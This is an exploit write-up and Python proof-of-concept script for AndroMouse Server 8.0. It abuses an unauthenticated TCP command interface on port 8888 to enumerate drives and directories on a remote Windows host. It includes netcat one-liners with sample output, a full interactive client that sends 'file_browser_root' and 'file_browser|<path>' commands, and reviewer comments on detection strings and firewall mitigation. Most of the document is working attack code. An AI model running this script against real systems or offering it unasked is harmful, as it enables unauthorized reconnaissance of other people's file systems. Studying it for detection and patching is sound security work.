# Exploit Title: AndroMouse Server 8.0 – Unauthenticated Directory Enumeration
# Date: 03/07/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://andromouse.com
# Software Link: https://andromouse-server.en.lo4d.com/windows
# Version: 8.0
# Tested on: Windows 10
r'''
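Description:
AndroMouse Server 8.0 exposes an unauthenticated TCP command interface on
port 8888. A remote attacker can send crafted commands such as
file_browser_root and file_browser|<directory> to enumerate the contents of
arbitrary directories on the host file system, without user interaction or
authentication. The impact demonstrated here is information disclosure
(drive letters, directory names and file names). Until the service requires
authentication, port 8888 should be reachable only from trusted hosts, for
example through a host firewall rule.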
POC 1:
echo -e "file_browser_root\n" | nc 192.168.8.104 8888
file_browser_root|C:\|F:\
POC 2:
echo -e "file_browser|C:\Users\public\\n" | nc 192.168.8.104 8888
file_browser | C:\Users\public | |
|Documents|Downloads|Music|Pictures|Videos
'''
import socket
import time
# Optional line editing for the interactive menu: prefer the standard
# ``readline`` module, fall back to ``pyreadline`` (the name used on Windows),
# and leave ``readline`` as None when neither can be imported.
readline = None
try:
    import readline
except ImportError:
    try:
        import pyreadline as readline
    except ImportError:
        pass
# Host running AndroMouse Server. The value is the private (192.168.0.0/16)
# address that the PoC commands in the module docstring also use.
TARGET_IP = "192.168.8.104"
# The script uses port 8888 for both the UDP datagram and the TCP command
# channel; a listener on this port is what an exposure check should look for.
UDP_PORT = 8888
TCP_PORT = 8888
# Every command is terminated with a single line feed (0x0A).
NEWLINE = b"\x0a"
def establish_udp_connection():
    """Send the ``connection_detect_server`` datagram twice over UDP.

    Each datagram goes to ``TARGET_IP:UDP_PORT`` and is followed by a
    one-second pause. No reply is read. The socket is always closed.

    NOTE(review): the page does not document what the server does with this
    datagram; it is presumably the client-discovery step. For detection, the
    literal string ``connection_detect_server`` in a UDP payload to port 8888
    is a stable marker of this script.
    """
    probe = b"connection_detect_server" + NEWLINE
    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        for _ in range(2):
            udp.sendto(probe, (TARGET_IP, UDP_PORT))
            time.sleep(1)
    finally:
        udp.close()
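def tcp_connect():
    """Open the TCP command channel to ``TARGET_IP:TCP_PORT``.

    Retries forever: after each failure it prints the error, waits three
    seconds and re-sends the UDP datagrams before trying again.

    Returns:
        A connected ``socket.socket`` with a 10-second timeout.
    """
    while True:
        sock = None
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(10)
            sock.connect((TARGET_IP, TCP_PORT))
            return sock
        except Exception as e:
            # Release the descriptor of the failed attempt. The original
            # left one socket open per retry, which leaks in this endless loop.
            if sock is not None:
                sock.close()
            print(f"[!] TCP connection failed: {e}. Retrying in 3s...")
            time.sleep(3)
            establish_udp_connection()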
def send_command(sock, command):
    """Send one newline-terminated command and return the stripped reply.

    The command is written as-is, with no credential or session token in
    front of it. That the server answers anyway is the missing
    authentication the advisory text in this file describes.

    Only a single ``recv`` of at most 4096 bytes is read, so a longer reply
    is returned truncated. Undecodable bytes are dropped.

    Raises:
        socket.timeout, ConnectionError, OSError: propagated unchanged to
            the caller, as in the original catch-and-re-raise.
    """
    payload = command.encode() + NEWLINE
    sock.sendall(payload)
    # Fixed pause instead of framing: the reply has no length prefix here.
    time.sleep(0.5)
    raw = sock.recv(4096)
    return raw.decode(errors="ignore").strip()
def list_drives(sock):
    """Request the drive list with ``file_browser_root`` and print it.

    The reply is expected to contain ``file_browser_root|`` followed by
    ``|``-separated drive names (the docstring PoC shows
    ``file_browser_root|C:\\|F:\\``).

    Returns:
        The non-empty drive fields, or ``[]`` when the marker is absent.
    """
    reply = send_command(sock, "file_browser_root")
    if "file_browser_root|" not in reply:
        print("No drives found")
        return []

    drives = []
    for field in reply.split("|")[1:]:
        name = field.strip()
        if name:
            drives.append(name)

    print("\nAvailable Drives:")
    for name in drives:
        print(f" {name}\\")
    return drives
def list_directory(sock, path):
    """Request a listing with ``file_browser|<path>`` and print it.

    The reply is split on ``|``: field 1 is echoed as the current path and
    fields from index 3 onward are treated as entries.

    An entry counts as a file when its last backslash-separated component
    contains a dot, otherwise as a directory. This is a display heuristic
    only: dotted folder names and extensionless files are misclassified.

    Returns:
        Directories followed by files, or ``[]`` when the reply lacks the
        ``file_browser |`` marker or has fewer than four fields.
    """
    reply = send_command(sock, f"file_browser|{path}")

    fields = []
    if "file_browser |" in reply:
        fields = [piece.strip() for piece in reply.split("|")]
    if len(fields) < 4:
        print("Directory not found or access denied")
        return []

    shown_path = fields[1]
    folders = []
    files = []
    for entry in fields[3:]:
        if not entry.strip():
            continue
        leaf = entry.split('\\')[-1]
        bucket = files if '.' in leaf else folders
        bucket.append(entry)

    print(f"\nContents of {shown_path}\n")
    for name in folders:
        print(f"<dir> {name}")
    for name in files:
        print(f"<file> {name}")
    print(f"\nTotal: {len(files)} files, {len(folders)} directories")
    return folders + files
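def interactive_shell():
    """Run the menu loop: list drives, browse a directory, or exit.

    Connects once (UDP datagrams, then TCP) and reconnects the same way
    whenever a socket error interrupts a request. Any other exception ends
    the loop.

    Compared with the original, the socket is closed in a ``finally`` block
    so that it is also released on Ctrl-C, and the bare ``except:`` clauses
    around ``close()`` are narrowed to ``OSError`` so they no longer swallow
    ``KeyboardInterrupt`` or ``SystemExit``.
    """
    establish_udp_connection()
    sock = tcp_connect()

    if readline:
        readline.parse_and_bind("tab: complete")
        readline.parse_and_bind("set editing-mode emacs")
        readline.parse_and_bind("set history-preserve-point on")

    try:
        while True:
            try:
                print("\n1. List drives\n2. Browse directory\n3. Exit")
                choice = input("> ").strip()
                if readline and choice:
                    readline.add_history(choice)

                if choice == "1":
                    list_drives(sock)
                elif choice == "2":
                    path = input("Enter path (e.g. C:\\): ").strip()
                    if path:
                        # The request format used here always ends the path
                        # with a backslash.
                        if not path.endswith("\\"):
                            path += "\\"
                        list_directory(sock, path)
                elif choice == "3":
                    break
            except (socket.timeout, ConnectionError, OSError) as e:
                print(f"[!] Connection lost: {e}. Reconnecting...")
                try:
                    sock.close()
                except OSError:
                    pass
                establish_udp_connection()
                sock = tcp_connect()
            except Exception as e:
                print(f"[!] Unexpected error: {e}")
                break
    finally:
        # Single exit point for the socket, whichever way the loop ended.
        try:
            sock.close()
        except OSError:
            pass

    print("[✓] Session ended.")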
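# Script entry point. The extracted page had the word "Data" (site navigation
# text) fused onto the call, which made the line a syntax error.
if __name__ == "__main__":
    interactive_shell()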